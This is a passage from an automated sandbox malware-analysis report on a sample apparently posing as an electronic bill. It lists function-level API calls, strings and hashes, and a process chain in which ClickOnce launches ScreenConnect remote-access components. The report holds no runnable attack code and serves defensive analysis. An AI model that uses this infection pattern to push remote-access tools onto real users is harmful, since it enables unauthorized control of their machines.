SetLastError.KERNEL32(00000000), ref: 009B449C
_abort.LIBCMT ref: 009B44A2

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: fd049c40430bffcf526b03618c20a5a052193f864881f241c48b3d058f7cf038
Instruction ID: 3492bde428778d7a8187d6c3850ee4512e442d04c59866b1f6965bc6ea9cd2d8
Opcode Fuzzy Hash: fd049c40430bffcf526b03618c20a5a052193f864881f241c48b3d058f7cf038
Instruction Fuzzy Hash: 88F02832914640ABC612B7396F09FFB22AF9BC1BB1B254514F528D61E7EFB188117161

Function 009B36FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009B36AD,?,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002), ref: 009B371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009B372F
FreeLibrary.KERNEL32(00000000,?,?,?,009B36AD,?,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002,00000000), ref: 009B3752

Strings

mscoree.dll, xrefs: 009B3715
CorExitProcess, xrefs: 009B3727

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 14c5be37604d50f3184fe0d4e1f452175de2a8ecfb723ad4ba3fbeca46f78ef6
Instruction ID: 5a2158ef885eaca3cd1d8c9c73139aab744744477a7f6b312192d06d3b171112
Opcode Fuzzy Hash: 14c5be37604d50f3184fe0d4e1f452175de2a8ecfb723ad4ba3fbeca46f78ef6
Instruction Fuzzy Hash: 9BF04470A14208BBCB119B94DD59BEEBFB8EF44765F404169F805A2190DBB45A44DA90

Function 009B634D Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009B54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 009B639A
__alloca_probe_16.LIBCMT ref: 009B63D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009B6423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009B6435
__freea.LIBCMT ref: 009B643E

Part of subcall function 009B62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009B7E5B,?,00000000,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD), ref: 009B6331

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: 177e54c73e9ebac12fde0ade1b04a0af2649401104fd5baa254cec777c96cfec
Instruction ID: 71147c678065bdb25821d5df7e1f714f03a5e76c5e1a25120963d135039fa90d
Opcode Fuzzy Hash: 177e54c73e9ebac12fde0ade1b04a0af2649401104fd5baa254cec777c96cfec
Instruction Fuzzy Hash: A231B072A0061AABDF259F64DD45EEE7BAAEF40720F044128FC14D61A0E739ED55CBA0

Function 009B561E Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 009B5627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009B564A

Part of subcall function 009B62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009B7E5B,?,00000000,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD), ref: 009B6331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009B5670
_free.LIBCMT ref: 009B5683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009B5692

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 06a116031c4312d879b1a6ba853a29b18ded6cb2dde472b09bb7a3c0dd43e088
Instruction ID: cebd59e6ea8e5808bbee415ddd254f3da62fceb80a79318fe6d6810380ca34b7
Opcode Fuzzy Hash: 06a116031c4312d879b1a6ba853a29b18ded6cb2dde472b09bb7a3c0dd43e088
Instruction Fuzzy Hash: 2601F772605A15BF27212ABA5E4CEBB6B6DDEC2FB4357022AF904C3140EBA08C0191B0

Function 009B44A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,009B47FE,009B7E79,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD,?,00000000), ref: 009B44AD
_free.LIBCMT ref: 009B44E2
_free.LIBCMT ref: 009B4509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009B4516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009B451F

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e1457ad83c7d54893c8242870985b258c9ea3749558b3f5087be20692fc9658e
Instruction ID: d7f400d38008ed6d779061d95098e211c8357b4f268c7dd4a41b8f6dce9827fe
Opcode Fuzzy Hash: e1457ad83c7d54893c8242870985b258c9ea3749558b3f5087be20692fc9658e
Instruction Fuzzy Hash: DB012876654A40ABC22277356F49FFB226EEBC17717250125F429D21D3EFB48D017120

Function 009B6176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009B618E

Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891

_free.LIBCMT ref: 009B61A0
_free.LIBCMT ref: 009B61B2
_free.LIBCMT ref: 009B61C4
_free.LIBCMT ref: 009B61D6

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 45aaa6da12682fe9687be15c613953d07221c2b94ef554ae8507710d493cbf68
Instruction ID: 194cf5283dde48c69dd7ed218cd775e1c75d514270bd60f4de6894d3f06c175d
Opcode Fuzzy Hash: 45aaa6da12682fe9687be15c613953d07221c2b94ef554ae8507710d493cbf68
Instruction Fuzzy Hash: 2CF09632A1C200AF8660EB5DFB81D9A77FDAA81B307580815F44DDB593C735FC809694

Function 009B3D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009B3DAD

Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891

_free.LIBCMT ref: 009B3DBF
_free.LIBCMT ref: 009B3DD2
_free.LIBCMT ref: 009B3DE3
_free.LIBCMT ref: 009B3DF4

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0a123ddc1269f74b22104cd22907c199462b85b4e9e01bf3edc4095c8e6e3055
Instruction ID: 50e982fd5637f034a4d47999d936bf0bc6d06e4b0d4d278c4ab2c8c50ab28912
Opcode Fuzzy Hash: 0a123ddc1269f74b22104cd22907c199462b85b4e9e01bf3edc4095c8e6e3055
Instruction Fuzzy Hash: A8F0DA79C2C2A0DFD751AF15FD01E893B74AB867303450216F5129A2F3CB314A51BBD9

Function 009B2F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\E_BILL0041272508.exe,00000104), ref: 009B2F93
_free.LIBCMT ref: 009B305E
_free.LIBCMT ref: 009B3068

Strings

C:\Users\user\Desktop\E_BILL0041272508.exe, xrefs: 009B2F8A, 009B2F91, 009B2FC0, 009B2FF8

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\E_BILL0041272508.exe
API String ID: 2506810119-172381570
Opcode ID: b223cfdcb8f6297194cb43e773d402063a431434b672bad456d80a4997a2a51e
Instruction ID: 459a15ff58deae3fcd9637c327c6bed35ad45fc441e6c02eddc1c6ae3f7e2cda
Opcode Fuzzy Hash: b223cfdcb8f6297194cb43e773d402063a431434b672bad456d80a4997a2a51e
Instruction Fuzzy Hash: EB31A475A04244AFCB21EB99DE80EEEBBFCEF86720F10406AF40597251D6708F41DB91

Function 009B25E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009B2594,00000000,?,009C1B50,?,?,?,009B2737,00000004,InitializeCriticalSectionEx,009BBC48,InitializeCriticalSectionEx), ref: 009B25F0
GetLastError.KERNEL32(?,009B2594,00000000,?,009C1B50,?,?,?,009B2737,00000004,InitializeCriticalSectionEx,009BBC48,InitializeCriticalSectionEx,00000000,?,009B24C7), ref: 009B25FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009B2622

Strings

api-ms-, xrefs: 009B2607

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 40044f4b298c904bcaf13b047a1376d14c04724a2d179cd8fb1677404e6fa6c8
Instruction ID: 781823d8a298f0eadcc15a397ca64b7df56d86e04633d5e2b7d4c1702ca42a68
Opcode Fuzzy Hash: 40044f4b298c904bcaf13b047a1376d14c04724a2d179cd8fb1677404e6fa6c8
Instruction Fuzzy Hash: A9E04831648308FBDF112BA1EE06FE93F58EB10B71F104421F90DE40E5E7E1D954A544

Function 009B57DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009B5784,00000000,00000000,00000000,00000000,?,009B5981,00000006,FlsSetValue), ref: 009B580F
GetLastError.KERNEL32(?,009B5784,00000000,00000000,00000000,00000000,?,009B5981,00000006,FlsSetValue,009BC4D8,FlsSetValue,00000000,00000364,?,009B44F6), ref: 009B581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009B5784,00000000,00000000,00000000,00000000,?,009B5981,00000006,FlsSetValue,009BC4D8,FlsSetValue,00000000), ref: 009B5829

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 47b6ca26ff73d184c83b1e834b69fa8bf8a33e3abab1b39245441741e956fb9b
Instruction ID: 487d114d90ef4328eaaf57e8e41798832c1d47eb0046bc775836e174dd38bd27
Opcode Fuzzy Hash: 47b6ca26ff73d184c83b1e834b69fa8bf8a33e3abab1b39245441741e956fb9b
Instruction Fuzzy Hash: C701DB32619726EBC7215B79AE44BA777ACAF057B17220A34FD1AD7180DB64DC00C6E0

Function 009B48BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009B4A27

Part of subcall function 009B474D: IsProcessorFeaturePresent.KERNEL32(00000017,009B473C,00000000,?,00000004,00000000,?,?,?,?,009B4749,00000000,00000000,00000000,00000000,00000000), ref: 009B474F
Part of subcall function 009B474D: GetCurrentProcess.KERNEL32(C0000417), ref: 009B4771
Part of subcall function 009B474D: TerminateProcess.KERNEL32(00000000), ref: 009B4778

Strings

*?, xrefs: 009B48FE
., xrefs: 009B4BDE

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
Instruction ID: 43d41496d8d73a32047087028d1a99350f2c27afdb5fd23896547235e6abdf3c
Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
Instruction Fuzzy Hash: E0519375E00219AFDF14CFA8C981AEEB7F9EF98720F244169E454E7342E6359E019B50

Analysis Process: dfsvc.exePID: 6456, Parent PID: 3568COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	411
Total number of Limit Nodes:	47

Executed Functions

Function 00007FFD34791548 Relevance: 1.8, APIs: 1, Instructions: 344
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFD34791827

Memory Dump Source

Source File: 00000002.00000002.4005627863.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34790000_dfsvc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: aa8bbd70d95d85ea3fbffc0810304ed1fb08098012a4e91ccd84715a95c2cc77
Instruction ID: 673269f0297c3d687a0e542f8d5388e36f3e72e799ebf647127992fcd5926ed3
Opcode Fuzzy Hash: aa8bbd70d95d85ea3fbffc0810304ed1fb08098012a4e91ccd84715a95c2cc77
Instruction Fuzzy Hash: 5EA12BA2B0EA894FF755DB7C44692B93BD1EF57310B4842BBD449D7193DE28E8068381

Function 00007FFD347A1232 Relevance: 1.8, APIs: 1, Instructions: 278
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetGetCookieW.WININET ref: 00007FFD347A1416

Memory Dump Source

Source File: 00000002.00000002.4005627863.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34790000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: 0d6e586f09993e0dd4f42821261033a99ed9b4be4d5e2a4795319912731401bf
Instruction ID: da4e7045aa25661bce9d015193b271ba1a76c458d7c45f8f412e56f692ec8de3
Opcode Fuzzy Hash: 0d6e586f09993e0dd4f42821261033a99ed9b4be4d5e2a4795319912731401bf
Instruction Fuzzy Hash: F991B270608B8D8FEBA9DF2888557E53BE1FF59311F04426ED84DC7292CA78A9458B81

Function 00007FFD3479994B Relevance: 1.7, APIs: 1, Instructions: 177
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFD34799A7C

Memory Dump Source

Source File: 00000002.00000002.4005627863.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34790000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5d180a76f366a41b9c951cb2573528a0877c06fe5979ec250767370859892cbd
Instruction ID: 96dd3ff741f61ab6f9c6d47d00039bc5ee40ab8d29b34e44abb7babe4c53ac14
Opcode Fuzzy Hash: 5d180a76f366a41b9c951cb2573528a0877c06fe5979ec250767370859892cbd
Instruction Fuzzy Hash: 24519071A0CA5C8FDB68DF58D855BE9BBE0FB69310F1442AEE04DD3252CB34A855CB81

Function 00007FFD3467EEBF Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4004959399.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3467d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13b2210a63a43cce277cebd795dc99bde782f18d25c3e1e3245ec2fa4486bf3
Instruction ID: 11ec94246360a1e5d46cfe0ffa27746615bf8dfaa32fa273fb1b45600d2d3a18
Opcode Fuzzy Hash: b13b2210a63a43cce277cebd795dc99bde782f18d25c3e1e3245ec2fa4486bf3
Instruction Fuzzy Hash: DA41F73150DBC44FE7568B38D8959923FF0EF57320B1541DFD088CB1A3D629A84AC7A2

Analysis Process: ScreenConnect.WindowsClient.exePID: 6552, Parent PID: 6456COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD3478F67B Relevance: 1.7, APIs: 1, Instructions: 178
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD3478F7AC

Memory Dump Source

Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3ab911311a6b51223a6d078e2a9794718719cbe9faf165bc7dfa4457cac58647
Instruction ID: e97e7b658de5795fd7078c895274b817dab19c3a81b2b3700898b9af85d4c68c
Opcode Fuzzy Hash: 3ab911311a6b51223a6d078e2a9794718719cbe9faf165bc7dfa4457cac58647
Instruction Fuzzy Hash: 99519271A0CA5C9FDB68DF58D845BE9BBE0FB59310F1442AEE04DD3252CB34A856CB81

Function 00007FFD34784978 Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 00007FFD3479F2C6

Memory Dump Source

Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: cfc7eb34f2ced6374eb8bf7010c19b9d83b24795faea89ffd656d495eee1c189
Instruction ID: fce9d378272f42dcbe30219ccbcd37c50e30b36802a17d70839f15fe7cb08851
Opcode Fuzzy Hash: cfc7eb34f2ced6374eb8bf7010c19b9d83b24795faea89ffd656d495eee1c189
Instruction Fuzzy Hash: 9631E67191CB488FDB18DB5C98466FD7BE0EB99315F00422EE089D3252DB74A81687D2

Function 00007FFD34783EAA Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD34788542

Memory Dump Source

Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: a3e912e21b7c1d0a48cd9c2c1faf73fb589c021ca844da811219c7ded1300798
Instruction ID: 7058c9a1a3ad5d4ee3af19b90aab4ed8751ba38116bc0e93a7612a0e88ae2616
Opcode Fuzzy Hash: a3e912e21b7c1d0a48cd9c2c1faf73fb589c021ca844da811219c7ded1300798
Instruction Fuzzy Hash: E321F771918B188FDB289F9C9C4A5F9B7E0EB55711F00412EE049D3211DB74B8458B81

Function 00007FFD347884B8 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD34788542

Memory Dump Source

Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 4fbdd3050a32b293ec4d2c168923505ac999a3c7195c49b3aa495f2fa2fbadb6
Instruction ID: 9b5d4a53068648967db191cffd72aa4525e1a84c7374085d1d12cac80b3dc992
Opcode Fuzzy Hash: 4fbdd3050a32b293ec4d2c168923505ac999a3c7195c49b3aa495f2fa2fbadb6
Instruction Fuzzy Hash: D731E53091CB188FDB28DF9C984A5E9BBE0EB55711F00422EE049D3251DB74A8558B82

Function 00007FFD34783DF2 Relevance: 1.3, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FFD3479F4DC

Memory Dump Source

Source File: 00000006.00000002.2387910671.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd34780000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2339d07c21b8fa9882e6c2c7d5327078c01cda3497e47709569d7fada50e8fdf
Instruction ID: 7ac96ae02d6a1b8ad55486761681272d897b9c93328081abff1a9b780adbe1d0
Opcode Fuzzy Hash: 2339d07c21b8fa9882e6c2c7d5327078c01cda3497e47709569d7fada50e8fdf
Instruction Fuzzy Hash: DA21E271A08A1C9FDB58DF988449BF9BBE0EB65321F00422ED049D3252DB74A866CB80

Analysis Process: ScreenConnect.ClientService.exePID: 1340, Parent PID: 6552COMMON

Executed Functions

Function 00FC20B5 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

, xrefs: 00FC237E

Memory Dump Source

Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID: 0-76226702
Opcode ID: 14a5e68546f5e330f218317c484cc4ce15ebf5c0da2e9bbc889c5dc924f6f286
Instruction ID: 2c64d91e6fd941cccfea347c6e6829e613ba2033b50cf3d931289a820d466a94
Opcode Fuzzy Hash: 14a5e68546f5e330f218317c484cc4ce15ebf5c0da2e9bbc889c5dc924f6f286
Instruction Fuzzy Hash: E7519E31B002468FC759EB28DA55BAE7BE2EF85314B1484ADD006DB362EF34DD05DB90

Function 00FC3480 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

[', xrefs: 00FC3548

Memory Dump Source

